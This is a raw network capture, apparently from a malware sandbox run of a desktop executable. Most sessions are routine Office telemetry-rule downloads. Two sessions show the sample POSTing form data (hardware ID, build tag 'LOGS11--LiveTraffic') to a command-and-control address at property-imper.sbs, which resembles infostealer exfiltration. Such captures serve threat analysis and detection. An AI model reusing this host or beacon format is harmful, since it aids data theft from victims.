                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                        x-ms-request-id: 8592a006-f01e-0085-6b6a-3c88ea000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041126Z-174c587ffdfcj798hC1TEB9bq400000003y000000000uepq
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:26 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        12192.168.2.74971413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:25 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                        x-ms-request-id: 81892826-901e-00ac-7050-3cb69e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041126Z-15b8b599d889gj5whC1TEBfyk000000003tg000000004wk9
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:26 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        13192.168.2.74971613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:26 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:26 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                        x-ms-request-id: 6ebbc676-001e-005a-784b-3cc3d0000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041126Z-15b8b599d88pxmdghC1TEBux9c000000040g00000000bkr4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:26 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        14192.168.2.749717104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:26 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=5TX32GKA
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 15022
                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                        2024-11-24 04:11:26 UTC15022OUTData Raw: 2d 2d 35 54 58 33 32 47 4b 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 41 46 45 44 38 41 38 43 46 38 42 41 44 34 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 35 54 58 33 32 47 4b 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 54 58 33 32 47 4b 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 54 58 33 32 47 4b 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                        Data Ascii: --5TX32GKAContent-Disposition: form-data; name="hwid"95AFED8A8CF8BAD4D7CBBD6DF28D3732--5TX32GKAContent-Disposition: form-data; name="pid"2--5TX32GKAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5TX32GKAContent-Di
                                                                                                                                                                        2024-11-24 04:11:27 UTC1027INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:26 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=42vj1o2abondd9ikitaltcjp0a; expires=Wed, 19-Mar-2025 21:58:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WofT%2Bte0sP43y9PfqtokxAu2aW1gFhPMy%2FP4dJh8kQY9gl5O%2FfHFFIUuda%2BK8f%2FlXufWRalys0ujrQY2EewWFXV0%2BwUkjo6lJfWgslqKj%2FJUsPAzOTsCmbBhJ72%2FvSN1pgXYV0E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768e121f888ca7-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1846&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15954&delivery_rate=1565683&cwnd=128&unsent_bytes=0&cid=68b2b3f0b2ee1072&ts=883&x=0"
                                                                                                                                                                        2024-11-24 04:11:27 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-24 04:11:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        15192.168.2.74971813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:28 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:28 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                        x-ms-request-id: e98193a8-301e-003f-0a64-3d266f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041128Z-15b8b599d88phfhnhC1TEBr51n00000003y000000000h1f2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        16192.168.2.74971913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:28 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:28 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                                                                                        x-ms-request-id: 9bcae678-901e-007b-2946-3cac50000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041128Z-178bfbc474b9fdhphC1NYCac0n00000005f0000000001g30
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        17192.168.2.74972213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:28 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:28 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                        x-ms-request-id: 30a29eaf-701e-001e-220f-3ef5e6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041128Z-178bfbc474btvfdfhC1NYCa2en00000005f000000000c544
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:28 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        18192.168.2.74972113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:28 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:28 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                        x-ms-request-id: ad60cd0f-c01e-008e-6f6a-3c7381000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041128Z-174c587ffdfb5q56hC1TEB04kg00000003s000000000kdy2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        19192.168.2.74972013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:28 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:28 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                        x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041128Z-178bfbc474btrnf9hC1NYCb80g00000005m000000000abs9
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        20192.168.2.749723104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:28 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=ESYKU00NDFI8Y
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 20377
                                                                                                                                                                        Host: property-imper.sbs
